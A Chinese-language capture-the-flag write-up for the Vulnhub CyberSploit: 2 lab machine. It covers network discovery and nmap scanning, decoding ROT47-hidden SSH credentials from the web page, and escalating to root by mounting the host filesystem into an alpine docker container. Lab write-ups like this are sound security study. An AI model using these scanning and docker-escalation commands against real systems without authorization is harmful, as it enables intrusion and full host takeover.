靶机渗透测试(CyberSploit: 2)
靶机渗透测试(CyberSploit: 2):
Vulnhub靶机 CyberSploit: 2
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Easy–Intermediate)
目标:Boot to Root .Your target is gain the Root access
渗透流程:
1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
命令:netdiscover -i eth0 -r 192.168.10.0
嗅探出靶机ip为 192.168.10.79
2. nmap进行靶机端口服务扫描
命令: nmap -sS -Pn -A -p- -n 192.168.10.79 (靶机ip)
可以看到靶机开放了22-ssh,80-http端口服务;
3. 根据端口服务进行渗透(80/tcp–http端口服务)
3.1. 访问web页面.
访问192.168.10.79:80页面,首先从web页面进行信息收集;
可以看到页面中存在了一些用户名与密码,网页中的其他url跳转地址均设置为#,不允许跳转!!!
3.2. 查看源代码.
查看源代码,在末尾处看到ROT47的指示命令>>baidu一波!!!
3.3. 使用rot47在线网站解密(移位密码)
经过百度可知为移位密码,所以回到80web页面,查看可疑d的用户名密码,进行编码转换;
ROT在线解密
得到ssh’登陆的用户名/ 密码:
shailendra/cybersploit1
4. ssh连接靶机(22/ssh端口服务)
4.1.ssh登陆
命令: ssh [email protected]
回车
输入密码 cybersploit1
4.2.docker容器
进入home家目录,发现存在hint.txt文件,cat查看文件内容,内容为docker;
使用id命令查看用户组,果然结果是docker组,再使用docker images命令发现本地没有镜像;
命令: docker inages
解题思路:联网拉取镜像;
5. 提权:
我们需要联网拉取镜像;
命令: docker pull alpine
alpine是迷你的linux系统
命令: docker images
用于查看本地已下载的镜像
命令: docker run -v /:/mnt -it alpine
执行镜像文件
提权成功,寻找flag的存放地址:
命令: find -name flag.txt
在docker中使用alpine
- 拉取启动
docker pull alpine
docker run -it --name 【containername】 【imagename】
-i 以交互模式运行容器,通常与 -t 同时使用;
-t 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
-d 后台运行容器,并返回容器ID; - 文件传输
从主机复制到容器sudo docker cp host_path containerID:container_path
从容器复制到主机sudo docker cp containerID:container_path host_path
实验总结:
本次实验过程中,使人耳目一新的是前期的信息收集模块,ROT移位密码的加密解密,然后登陆ssh,得到低权限用户;
在提权过程中,本次靶机使用docker镜像拉取,docker的一系列命令是本次的新颖;
参考博客:
http://c.biancheng.net/view/3143.html